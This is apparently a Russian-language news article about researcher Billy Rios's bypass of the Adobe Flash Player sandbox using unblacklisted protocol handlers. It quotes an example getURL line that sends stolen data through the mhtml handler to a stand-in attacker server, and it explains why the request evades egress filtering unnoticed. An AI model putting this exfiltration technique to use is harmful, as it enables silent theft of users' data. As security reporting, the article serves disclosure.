Песочница Adobe для Flash не так уж и безопасна

Идея на бумаге звучала великолепно: добавить песочницу в Adobe Flash, чтобы предотвратить множество атак, затрагивающих базовую операционную систему. Однако похоже, что песочница, представленная в декабре 2010 года, не так эффективна, как могла бы. Исследователь безопасности Билли Риос обнаружил способ локального обхода песочницы Adobe Flash Player.

Он обнаружил, что SWF-файлы, загружаемые из локального файла, на самом деле могут обходить песочницу, передавая «содержимое на сервер злоумышленника через getURL () и URL-адрес типа: file: // ..». Однако это можно использовать только для передачи IP-адресов и имен хостов и никаких других данных.

Однако данные также могут быть отправлены на удаленный сервер в Интернете. Решение было быстро найдено; Adobe заносит обработчики протоколов в черный список (через), что означает, что Flash Player будет блокировать некоторые протоколы (например, JavaScript: //), но разрешать другие (например, mailto: //). Хотя теоретически можно обойти черный список, еще более простым решением является поиск протокола, который в настоящее время не включен в список.

Билли Риос обнаружил протокол mhtml:

Существует большое количество обработчиков протоколов, отвечающих критериям, указанным в предыдущем предложении, но мы будем использовать обработчик протокола mhtml в качестве примера. Обработчик протокола mhtml доступен в современных системах Windows, может использоваться без каких-либо запросов и не попадает в черный список Flash. Используя обработчик протокола mhtml, легко обойти тестовую среду Flash:

getURL (‘mhtml: http: //attacker-server.com/stolen-data-here‘, ”);

Некоторые другие преимущества использования обработчика протокола mhtml:

Запрос проходит через http / https и порт 80/443, поэтому большая часть исходящей фильтрации будет пройдена.
Если запрос завершится ошибкой 404, он автоматически завершится ошибкой. Данные по-прежнему будут передаваться на сервер злоумышленников, но жертва никогда не увидит индикации передачи.
Обработчик протокола доступен по умолчанию в Win7 и запускается без предупреждения обработчика протокола.

Злоумышленникам необходимо создать Flash-файл, в который они добавят запрос mhtml. Затем пользователям нужно будет запустить файл в своей компьютерной системе. Как он туда попал? Например, по электронной почте или в рамках вирусной атаки. (через)

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *